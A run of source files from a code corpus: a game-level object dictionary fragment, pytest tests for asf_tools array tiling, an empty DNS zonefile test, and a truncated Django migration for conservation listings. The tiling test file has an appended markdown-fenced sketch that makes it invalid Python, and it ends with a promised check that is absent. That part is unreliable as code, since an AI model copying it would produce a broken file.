'1185821165.59kmuller', '1185821199.36kmuller', '1185822035.98kmuller', '1184015806.59kmuller', '1185822059.48kmuller', '1185920461.76kmuller', '1194984449.66akelts', '1185824206.22kmuller', '1184003446.23kmuller', '1184003254.85kmuller', '1184003218.74kmuller', '1184002700.44kmuller', '1186705073.11kmuller', '1187658531.86akelts', '1186705214.3kmuller', '1185824927.28kmuller', '1184014204.54kmuller', '1184014152.84kmuller']},'ObjectIds': {'1150922126.8dzlu': '["Objects"]["1150922126.8dzlu"]','1155695180.13sdnaik': 
'["Objects"]["1150922126.8dzlu"]["Objects"]["1155695180.13sdnaik"]','1157477467.36dxschafe': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560059.16akelts"]["Objects"]["1157477467.36dxschafe"]','1160703177.58JB': '["Objects"]["1150922126.8dzlu"]["Objects"]["1160703177.58JB"]','1162575677.17Shochet': '["Objects"]["1150922126.8dzlu"]["Objects"]["1162575677.17Shochet"]','1168493928.34kmuller': '["Objects"]["1150922126.8dzlu"]["Objects"]["1168493928.34kmuller"]','1169577216.0dxschafe0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1169577216.0dxschafe0"]','1172542336.0jubutler8': '["Objects"]["1150922126.8dzlu"]["Objects"]["1172542336.0jubutler8"]','1178941184.0JB': '["Objects"]["1150922126.8dzlu"]["Objects"]["1178941184.0JB"]','1192581038.5akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1192581038.5akelts"]','1193359744.0dxschafe0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1193359744.0dxschafe0"]','1219967635.89akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967635.89akelts"]','1219967645.94akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967645.94akelts"]','1219967701.58akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967701.58akelts"]','1219967702.73akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967702.73akelts"]','1219967703.58akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967703.58akelts"]','1219967706.25akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967706.25akelts"]','1219967754.09akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967754.09akelts"]','1219967765.61akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967765.61akelts"]','1219967783.2akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967783.2akelts"]','1219967783.72akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967783.72akelts"]','1219967784.53akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967784.53akelts"]','1219967786.83akelts': 
'["Objects"]["1150922126.8dzlu"]["Objects"]["1219967786.83akelts"]','1219967791.12akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967791.12akelts"]','1219967800.16akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967800.16akelts"]','1219967801.34akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967801.34akelts"]','1219967801.8akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967801.8akelts"]','1219967802.26akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967802.26akelts"]','1219967803.17akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967803.17akelts"]','1219967803.53akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967803.53akelts"]','1219967804.08akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967804.08akelts"]','1219967825.34akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967825.34akelts"]','1219967825.34akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967825.34akelts"]','1219967835.67akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967835.67akelts"]','1219967835.67akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967835.67akelts"]','1219967841.55akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967841.55akelts"]','1219967841.55akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967841.55akelts"]','1219967846.48akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967846.48akelts"]','1219967846.48akelts0': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967846.48akelts"]','1219967941.09akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967941.09akelts"]','1219967941.67akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967941.67akelts"]','1219967943.19akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967943.19akelts"]','1219967943.7akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967943.7akelts"]','1219967944.26akelts': 
'["Objects"]["1150922126.8dzlu"]["Objects"]["1219967944.26akelts"]','1219967945.2akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967945.2akelts"]','1219967946.76akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967946.76akelts"]','1219967951.66akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967951.66akelts"]','1219967952.39akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967952.39akelts"]','1219967952.83akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967952.83akelts"]','1219967953.48akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967953.48akelts"]','1219967953.83akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967953.83akelts"]','1219967955.66akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967955.66akelts"]','1219967957.7akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967957.7akelts"]','1219967959.91akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1219967959.91akelts"]','1228348366.44akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1228348366.44akelts"]','1234560059.16akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560059.16akelts"]','1234560512.0akelts1': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560512.0akelts1"]','1234560512.0akelts2': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560512.0akelts1"]["Objects"]["1234560512.0akelts2"]','1234560512.0akelts3': '["Objects"]["1150922126.8dzlu"]["Objects"]["1234560512.0akelts1"]["Objects"]["1234560512.0akelts3"]','1235762221.72akelts': '["Objects"]["1150922126.8dzlu"]["Objects"]["1228348366.44akelts"]["Objects"]["1235762221.72akelts"]'}}
extraInfo = {'camPos': Point3(2225.62, -1352.79, 1400.6),'camHpr': VBase3(58.7196, -28.4208, -1.94155e-06),'focalLength': 1.39999997616,'skyState': -2,'fog': 0}
ea87ff66485ca35341c38984e1491b8bfc5859e7 | 5,079 | py | Python | tests/test_tile.py | jhkennedy/asf-tools | f218cf80b98c4eb0e6f66e53244a15e198d49012 | ["BSD-3-Clause"] | 2 | 2021-06-17T13:25:15.000Z | 2021-12-01T08:19:05.000Z | tests/test_tile.py | jhkennedy/asf-tools | f218cf80b98c4eb0e6f66e53244a15e198d49012 | ["BSD-3-Clause"] | 23 | 2020-11-25T00:45:57.000Z | 2022-03-17T22:05:58.000Z | tests/test_tile.py | ASFHyP3/GIS-tools | 435a544bd6f3f4953679e5d891c0e454f7bdd471 | ["BSD-3-Clause"] | 4 | 2021-05-10T06:03:44.000Z | 2021-10-08T19:48:31.000Z |
import numpy as np
import pytest

from asf_tools import tile


def test_tile_array():
    a = np.array([[0, 0, 1, 1],
                  [0, 0, 1, 1],
                  [2, 2, 3, 3],
                  [2, 2, 3, 3]])

    tiled = tile.tile_array(a, tile_shape=(2, 2))
    assert tiled.shape == (4, 2, 2)
    assert np.all(tiled[0, :, :] == np.array([[0, 0], [0, 0]]))
    assert np.all(tiled[-1, :, :] == np.array([[3, 3], [3, 3]]))

    with pytest.raises(ValueError):
        tile.tile_array(a, tile_shape=(3, 3))

    tiled = tile.tile_array(a, tile_shape=(3, 3), pad_value=4)
    assert tiled.shape == (4, 3, 3)
    assert np.all(tiled[0, :, :] == np.array([[0, 0, 1], [0, 0, 1], [2, 2, 3]]))
    assert np.all(tiled[-1, :, :] == np.array([[3, 4, 4], [4, 4, 4], [4, 4, 4]]))

    tiled = tile.tile_array(a, tile_shape=(2, 3), pad_value=4)
    assert tiled.shape == (4, 2, 3)
    assert np.all(tiled[0, :, :] == np.array([[0, 0, 1], [0, 0, 1]]))
    assert np.all(tiled[-1, :, :] == np.array([[3, 4, 4], [3, 4, 4]]))

    tiled = tile.tile_array(a, tile_shape=(3, 2), pad_value=4)
    assert tiled.shape == (4, 3, 2)
    assert np.all(tiled[0, :, :] == np.array([[0, 0], [0, 0], [2, 2]]))
    assert np.all(tiled[-1, :, :] == np.array([[3, 3], [4, 4], [4, 4]]))


def test_tile_masked_array():
    a = np.array([[0, 0, 1, 1],
                  [0, 0, 1, 1],
                  [2, 2, 3, 3],
                  [2, 2, 3, 3]])

    with pytest.raises(AttributeError):
        _ = tile.tile_array(a, tile_shape=(2, 2)).mask

    m = np.array([[False, False, False, True],
                  [False, False, False, False],
                  [False, False, False, False],
                  [False, False, False, True]])
    ma = np.ma.MaskedArray(a, mask=m)

    tiled = tile.tile_array(ma, tile_shape=(2, 2))
    assert tiled.shape == (4, 2, 2)
    assert isinstance(tiled, np.ma.MaskedArray)
    assert np.all(
        tiled.mask == np.array([[[False, False],
                                 [False, False]],
                                [[False, True],
                                 [False, False]],
                                [[False, False],
                                 [False, False]],
                                [[False, False],
                                 [False, True]]])
    )

    tiled = tile.tile_array(ma, tile_shape=(3, 3), pad_value=4)
    assert isinstance(tiled, np.ma.MaskedArray)
    assert tiled.shape == (4, 3, 3)
    assert np.all(np.ma.getdata(tiled[0, :, :]) == np.array([[0, 0, 1], [0, 0, 1], [2, 2, 3]]))
    assert np.all(
        tiled[0, :, :].mask == np.array([[False, False, False], [False, False, False], [False, False, False]])
    )
    assert np.all(np.ma.getdata(tiled[-1, :, :]) == np.array([[3, 4, 4], [4, 4, 4], [4, 4, 4]]))
    assert np.all(
        tiled[-1, :, :].mask == np.array([[True, True, True], [True, True, True], [True, True, True]])
    )


def test_untile_array():
    a = np.array([[0, 0, 1, 1, 2, 2],
                  [0, 0, 1, 1, 2, 2],
                  [3, 3, 4, 4, 5, 5],
                  [3, 3, 4, 4, 5, 5],
                  [6, 6, 7, 7, 8, 8],
                  [6, 6, 7, 7, 8, 8],
                  ])

    assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(2, 2)), array_shape=a.shape))
    assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(4, 4), pad_value=9), array_shape=a.shape))
    assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(2, 4), pad_value=9), array_shape=a.shape))
    assert np.all(a == tile.untile_array(tile.tile_array(a, tile_shape=(4, 2), pad_value=9), array_shape=a.shape))

    with pytest.raises(ValueError):
        tile.untile_array(tile.tile_array(a, tile_shape=(4, 4)), array_shape=(9, 9))
    with pytest.raises(ValueError):
        tile.untile_array(tile.tile_array(a, tile_shape=(2, 4), pad_value=9), array_shape=(6, 9))

    # array shape will subset some of the padding that was required to tile `a` with `tile_shape`
    assert np.all(
        np.pad(a, ((0, 0), (0, 2)), constant_values=9)
        == tile.untile_array(tile.tile_array(a, tile_shape=(2, 4), pad_value=9), array_shape=(6, 8))
    )


def test_untile_masked_array():
    a = np.array([[0, 0, 1, 1],
                  [0, 0, 1, 1],
                  [2, 2, 3, 3],
                  [2, 2, 3, 3]])

    with pytest.raises(AttributeError):
        _ = tile.untile_array(tile.tile_array(a, tile_shape=(2, 2)), array_shape=a.shape).mask

    m = np.array([[False, False, False, True],
                  [False, False, False, False],
                  [False, False, False, False],
                  [False, False, False, True]])
    ma = np.ma.MaskedArray(a, mask=m)

    untiled = tile.untile_array(tile.tile_array(ma.copy(), tile_shape=(2, 2)), array_shape=a.shape)
    assert np.all(ma == untiled)
    assert np.all(ma.mask == untiled.mask)

    untiled = tile.untile_array(tile.tile_array(ma.copy(), tile_shape=(3, 3), pad_value=4), array_shape=a.shape)
    assert np.all(ma == untiled)
    assert np.all(ma.mask == untiled.mask)
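# The tests above exercise `tile.tile_array`/`tile.untile_array` from asf_tools.
# For reference, a minimal sketch of such a tiling round-trip using only numpy
# reshape/swapaxes follows. This is an illustration consistent with the tested
# behaviour, NOT the actual asf_tools implementation (it ignores masked arrays).

```python
import numpy as np


def tile_array(a, tile_shape=(2, 2), pad_value=None):
    """Split a 2D array into tiles of tile_shape, padding on the bottom/right if needed."""
    tile_rows, tile_cols = tile_shape
    rows, cols = a.shape
    pad_rows = -rows % tile_rows  # rows needed to reach the next multiple of tile_rows
    pad_cols = -cols % tile_cols
    if pad_rows or pad_cols:
        if pad_value is None:
            raise ValueError('array shape is not evenly divisible by tile_shape; provide pad_value')
        a = np.pad(a, ((0, pad_rows), (0, pad_cols)), constant_values=pad_value)
        rows, cols = a.shape
    # reshape to (row-blocks, tile_rows, col-blocks, tile_cols), then bring the
    # block indices together so the flattened axis enumerates tiles row-major
    tiles = a.reshape(rows // tile_rows, tile_rows, cols // tile_cols, tile_cols)
    return tiles.swapaxes(1, 2).reshape(-1, tile_rows, tile_cols)


def untile_array(tiled, array_shape):
    """Reassemble tiles produced by tile_array, trimming any padding to array_shape."""
    n_tiles, tile_rows, tile_cols = tiled.shape
    rows, cols = array_shape
    padded_rows = rows + (-rows % tile_rows)
    padded_cols = cols + (-cols % tile_cols)
    if n_tiles != (padded_rows // tile_rows) * (padded_cols // tile_cols):
        raise ValueError('number of tiles does not match array_shape')
    a = tiled.reshape(padded_rows // tile_rows, padded_cols // tile_cols, tile_rows, tile_cols)
    a = a.swapaxes(1, 2).reshape(padded_rows, padded_cols)
    return a[:rows, :cols]
```

# A quick round-trip check mirroring the first test case: a 4x4 block array
# tiled at (2, 2) yields four tiles and untiles back to the original.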
ea90c69c9313f1c198ea4ac792fcc591e22e94f5 | 62 | py | Python | swandns/modules/tests/test_zonefile.py | tpotlog/swan-dns | 0c390b7cffbe80a1c8814990523ebae5cf4f4e56 | ["MIT"] | 5 | 2017-08-30T11:20:43.000Z | 2019-05-27T11:37:21.000Z | swandns/modules/tests/test_zonefile.py | tpotlog/swan-dns | 0c390b7cffbe80a1c8814990523ebae5cf4f4e56 | ["MIT"] | null | null | null | swandns/modules/tests/test_zonefile.py | tpotlog/swan-dns | 0c390b7cffbe80a1c8814990523ebae5cf4f4e56 | ["MIT"] | 2 | 2017-08-30T18:54:59.000Z | 2019-10-28T03:38:48.000Z |
from swandns.modules import zonefile


def test_x():
    pass
57c2a4a3f7a9347b5e0a3a9daaf54216ede14b94 | 38,611 | py | Python | conservation/migrations/0001_squashed_0027_auto_20180509_1048.py | ropable/wastd | 295c60760548d177859de9c0bebdae93342767d0 | ["MIT"] | 3 | 2020-07-23T06:37:43.000Z | 2022-01-27T09:40:40.000Z | conservation/migrations/0001_squashed_0027_auto_20180509_1048.py | ropable/wastd | 295c60760548d177859de9c0bebdae93342767d0 | ["MIT"] | 337 | 2018-07-12T05:56:29.000Z | 2022-03-30T02:40:41.000Z | conservation/migrations/0001_squashed_0027_auto_20180509_1048.py | ropable/wastd | 295c60760548d177859de9c0bebdae93342767d0 | ["MIT"] | 2 | 2020-02-24T00:05:46.000Z | 2020-07-15T07:02:29.000Z |
# Generated by Django 2.0.7 on 2018-07-31 05:45
import conservation.models
import django.db.models.deletion
import django_fsm
from django.conf import settings
from django.db import migrations, models


class Migration(migrations.Migration):

    replaces = [('conservation', '0001_initial'), ('conservation', '0002_auto_20180404_1327'), ('conservation', '0003_auto_20180404_1512'), ('conservation', '0004_auto_20180404_1515'), ('conservation', '0005_auto_20180404_1532'), ('conservation', '0006_auto_20180405_0928'), ('conservation', '0007_auto_20180405_0934'), ('conservation', '0008_auto_20180405_1008'), ('conservation', '0009_auto_20180405_1009'), ('conservation', '0010_auto_20180405_1039'), ('conservation', '0011_auto_20180410_1504'), ('conservation', '0012_auto_20180411_1008'), ('conservation', '0013_auto_20180411_1314'), ('conservation', '0014_auto_20180411_1314'), ('conservation', '0015_auto_20180411_1324'), ('conservation', '0016_auto_20180411_1416'), ('conservation', '0017_auto_20180411_2121'), ('conservation', '0018_auto_20180411_2131'), ('conservation', '0019_auto_20180411_2204'), ('conservation', '0020_auto_20180413_2031'), ('conservation', '0021_auto_20180413_2122'), ('conservation', '0022_auto_20180413_2123'), ('conservation', '0023_auto_20180417_1650'), ('conservation', '0024_auto_20180420_1140'), ('conservation', '0025_conservationcategory_current'), ('conservation', '0026_document_last_reviewed_on'), ('conservation', '0027_auto_20180509_1048')]

    initial = True

    dependencies = [
        ('taxonomy', '0001_squashed_0078_auto_20180717_1601'),
        ('contenttypes', '0002_remove_content_type_name'),
        # ('taxonomy', '0040_auto_20180404_1113'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='CommunityGazettal',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('is_s5', models.BooleanField(db_index=True, default=False, help_text='Whether this Gazettal includes Conservation Category S5 (Migratory Bird).', verbose_name='Cons Category S5')),
                ('is_m1', models.BooleanField(db_index=True, default=False, help_text='Whether this Gazettal includes Conservation Category M1.', verbose_name='Cons Category M1')),
                ('is_m2', models.BooleanField(db_index=True, default=False, help_text='Whether this Gazettal includes Conservation Category M2.', verbose_name='Cons Category M2')),
                ('is_m3', models.BooleanField(db_index=True, default=False, help_text='Whether this Gazettal includes Conservation Category M3.', verbose_name='Cons Category M3')),
                ('is_m4', models.BooleanField(db_index=True, default=False, help_text='Whether this Gazettal includes Conservation Category M4.', verbose_name='Cons Category M4')),
                ('status', django_fsm.FSMField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'Inactive')], db_index=True, default=0, help_text='The approval status of the Gazettal.', max_length=50, verbose_name='Approval status')),
('proposed_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was proposed on.', null=True, verbose_name='Proposed on')),
('gazetted_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was gazetted on.', null=True, verbose_name='Gazetted on')),
('deactivated_on', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was deactivated on, most likely superseded by another Gazettal.', null=True, verbose_name='Deactivated on')),
('review_due', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal should be reviewed.', null=True, verbose_name='Review due date')),
('comments', models.TextField(help_text='Append comments on approval process as appropriate.', verbose_name='Comments')),
('community', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='taxonomy.Community')),
],
options={
'verbose_name': 'Community Gazettal',
'verbose_name_plural': 'Community Gazettals',
},
),
migrations.CreateModel(
name='ConservationCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(help_text='A category code, unique within its conservation list.',
max_length=500, verbose_name='Code')),
('label', models.CharField(help_text='An explanatory label.', max_length=500, verbose_name='Label')),
('description', models.TextField(help_text='A comprehensive description.', verbose_name='Description')),
],
options={
'verbose_name': 'Conservation Category',
'verbose_name_plural': 'Conservation Categories',
},
),
migrations.CreateModel(
name='ConservationCriterion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(help_text='A criterion code, unique within its conservation list.',
max_length=500, verbose_name='Code')),
('label', models.CharField(help_text='An explanatory label.', max_length=500, verbose_name='Label')),
('description', models.TextField(help_text='A comprehensive description.', verbose_name='Description')),
],
options={
'verbose_name': 'Conservation Criterion',
'verbose_name_plural': 'Conservation Criteria',
},
),
migrations.CreateModel(
name='ConservationList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('scope_wa', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable state-wide.', verbose_name='Applies to WA')),
('scope_cmw', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable nation-wide.', verbose_name='Applies to Commonwealth')),
('scope_intl', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable internationally.', verbose_name='Applies Internationally')),
('code', models.CharField(help_text='A Conservation List code.', max_length=500, unique=True, verbose_name='Code')),
('label', models.CharField(blank=True, help_text='An explanatory label.',
max_length=500, null=True, verbose_name='Label')),
('description', models.TextField(blank=True,
help_text='A comprehensive description.', null=True, verbose_name='Description')),
('active_from', models.DateTimeField(blank=True,
help_text='The date and time from which this list is current.', null=True, verbose_name='Active from')),
('active_to', models.DateTimeField(
blank=True, help_text='The date and time from which this list is non-current.', null=True, verbose_name='Active to')),
('scope_communities', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable to ecological communities.', verbose_name='Applies to Communities')),
('scope_species', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable to individual species.', verbose_name='Applies to Species')),
('approval_level', models.PositiveIntegerField(choices=[(10, 'Immediate'), (20, 'Panel'), (25, 'Director'), (
30, 'Minister')], default=30, help_text='What is the highest required approval instance for this list?', verbose_name='Approval Level')),
],
options={
'verbose_name': 'Conservation List',
'verbose_name_plural': 'Conservation Lists',
'ordering': ['-active_from'],
},
),
migrations.CreateModel(
name='TaxonGazettal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', django_fsm.FSMField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'Inactive')], db_index=True, default=0, help_text='The approval status of the Gazettal.', max_length=50, verbose_name='Approval status')),
('proposed_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was proposed on.', null=True, verbose_name='Proposed on')),
('gazetted_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was gazetted on.', null=True, verbose_name='Gazetted on')),
('deactivated_on', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was deactivated on, most likely superseded by another Gazettal.', null=True, verbose_name='Deactivated on')),
('review_due', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal should be reviewed.', null=True, verbose_name='Review due date')),
('comments', models.TextField(blank=True,
help_text='Append comments on approval process as appropriate.', null=True, verbose_name='Comments')),
('criteria', models.ManyToManyField(help_text='The Conservation Criteria form the reason for the choice of conservation category.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria')),
('taxon', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='taxonomy.Taxon')),
],
options={
'verbose_name': 'Taxon Gazettal',
'verbose_name_plural': 'Taxon Gazettals',
},
),
migrations.AddField(
model_name='conservationcriterion',
name='conservation_list',
field=models.ForeignKey(help_text='The conservation list this code is described in.',
on_delete=django.db.models.deletion.CASCADE, to='conservation.ConservationList', verbose_name='Conservation List'),
),
migrations.AddField(
model_name='conservationcategory',
name='conservation_list',
field=models.ForeignKey(help_text='The conservation list this code is described in.',
on_delete=django.db.models.deletion.CASCADE, to='conservation.ConservationList', verbose_name='Conservation List'),
),
migrations.AddField(
model_name='communitygazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation categories.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AlterField(
model_name='conservationcriterion',
name='description',
field=models.TextField(blank=True, help_text='A comprehensive description.',
null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='conservationcriterion',
name='label',
field=models.CharField(blank=True, help_text='An explanatory label.',
max_length=500, null=True, verbose_name='Label'),
),
migrations.AlterUniqueTogether(
name='conservationcriterion',
unique_together={('conservation_list', 'code')},
),
migrations.AlterField(
model_name='conservationcategory',
name='description',
field=models.TextField(blank=True, help_text='A comprehensive description.',
null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='conservationcategory',
name='label',
field=models.CharField(blank=True, help_text='An explanatory label.',
max_length=500, null=True, verbose_name='Label'),
),
migrations.AlterUniqueTogether(
name='conservationcategory',
unique_together={('conservation_list', 'code')},
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m1',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m2',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m3',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m4',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_s5',
),
migrations.AlterField(
model_name='communitygazettal',
name='comments',
field=models.TextField(
blank=True, help_text='Append comments on approval process as appropriate.', null=True, verbose_name='Comments'),
),
migrations.AddField(
model_name='communitygazettal',
name='category',
field=models.ManyToManyField(blank=True, help_text='The Conservation Categories can change during the approval process. Some combinations are valid, some are not.',
to='conservation.ConservationCategory', verbose_name='Conservation Categories'),
),
migrations.AddField(
model_name='taxongazettal',
name='category',
field=models.ManyToManyField(blank=True, help_text='The Conservation Categories can change during the approval process. Some combinations are valid, some are not.',
to='conservation.ConservationCategory', verbose_name='Conservation Categories'),
),
migrations.AlterField(
model_name='taxongazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation category.',
null=True, to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AddField(
model_name='communitygazettal',
name='category_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation categories.', null=True, verbose_name='Category list'),
),
migrations.AddField(
model_name='communitygazettal',
name='criteria_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation criteria.', null=True, verbose_name='Criteria list'),
),
migrations.AddField(
model_name='taxongazettal',
name='category_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation categories.', null=True, verbose_name='Category list'),
),
migrations.AddField(
model_name='taxongazettal',
name='criteria_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation criteria.', null=True, verbose_name='Criteria list'),
),
migrations.AlterField(
model_name='taxongazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation category.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AddField(
model_name='communitygazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Gazettal minus the Taxon.', null=True, verbose_name='Gazettal label'),
),
migrations.AddField(
model_name='taxongazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Gazettal minus the Taxon.', null=True, verbose_name='Gazettal label'),
),
migrations.AlterField(
model_name='communitygazettal',
name='community',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='community_gazettal', to='taxonomy.Community'),
),
migrations.AlterField(
model_name='taxongazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation categories.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AlterField(
model_name='taxongazettal',
name='taxon',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='taxon_gazettal', to='taxonomy.Taxon'),
),
migrations.RemoveField(
model_name='communitygazettal',
name='status',
),
migrations.RemoveField(
model_name='taxongazettal',
name='status',
),
migrations.AddField(
model_name='communitygazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'De-listed')], db_index=True, default=0, help_text='The approval status of the Gazettal.', verbose_name='Approval status'),
),
migrations.AddField(
model_name='taxongazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'De-listed')], db_index=True, default=0, help_text='The approval status of the Gazettal.', verbose_name='Approval status'),
),
migrations.CreateModel(
name='FileAttachment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attachment', models.FileField(upload_to=conservation.models.fileattachment_media)),
('object_id', models.PositiveIntegerField()),
('title', models.CharField(blank=True, help_text='A self-explanatory title for the file attachment.',
max_length=500, null=True, verbose_name='Title')),
('author', models.ForeignKey(blank=True, help_text='The person who authored and endorsed this file.',
null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Author')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('confidential', models.BooleanField(db_index=True, default=True,
help_text='Whether this file is confidential or can be released to the public.', verbose_name='Is confidential')),
('current', models.BooleanField(db_index=True, default=True,
help_text='Whether this file is current or an archived version.', verbose_name='Is current')),
],
),
migrations.AlterModelOptions(
name='conservationcategory',
options={'ordering': ['conservation_list', 'rank'], 'verbose_name': 'Conservation Category',
'verbose_name_plural': 'Conservation Categories'},
),
migrations.AlterModelOptions(
name='conservationcriterion',
options={'ordering': ['conservation_list', 'rank'],
'verbose_name': 'Conservation Criterion', 'verbose_name_plural': 'Conservation Criteria'},
),
migrations.AddField(
model_name='communitygazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CMW'), (2, 'INT'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AddField(
model_name='communitygazettal',
name='source',
